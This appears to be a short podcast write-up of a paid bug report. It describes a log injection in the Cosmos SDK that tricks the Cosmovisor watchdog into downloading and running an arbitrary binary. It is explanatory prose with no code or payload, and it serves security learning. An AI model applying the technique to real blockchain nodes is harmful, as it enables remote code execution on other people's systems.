Remote Code Execution and Denial of Service Vulnerability in Cosmos SDK with Cosmovisor (2500 USD)

We discussed this vulnerability during Episode 219 on 20 October 2023

Log injections are a class of bug that is often overlooked, both because it is difficult to spot during a black box engagement, and because the impact is difficult to determine. IN this case though the impact was easier to spot because the program processing the output logs was part of the same application. Effectively Cosmos SDK would run a watchdog application that would watch the standard output of the main application, certain output log strings could trigger the watchdog application to perform certain actions. Most interesting to the author here was a string that would result in the watchdog downloading and executing a new binary. This sort of functionality just sounds dangerous, so the author set out to prove first that a simple log injection would be all that was needed by introducing a vulnerable log statement.

Once the vulnerability concept was proven it was time to hunt for an actually vulnerable log statement. Unfortunately most log statement would escape the quote characters in the part of the log that attackers could easily control. With the quotes being escaped the watchdog wouldn’t recognize the trigger statement. Ultimately they did find one rather odd logging statement. that would attempt to print a message in the usual logger format, but it would do so merging the whole statement into the description parameter, which is not escaped, and usually would be a fixed string not influenced by an attacker.

Honestly this logging statement feels very odd to me, perhaps a remnant of older code before the logging system added support for the nice printing of key/values but regardless, it works great for an attacker who can inject their a fake upgrade command into the output and get arbitrary code downloaded and run. Its a rather fun bug in my opinion and as the author points out, while it is technically a Web3 bug, it feels very much like a more standard application security bug.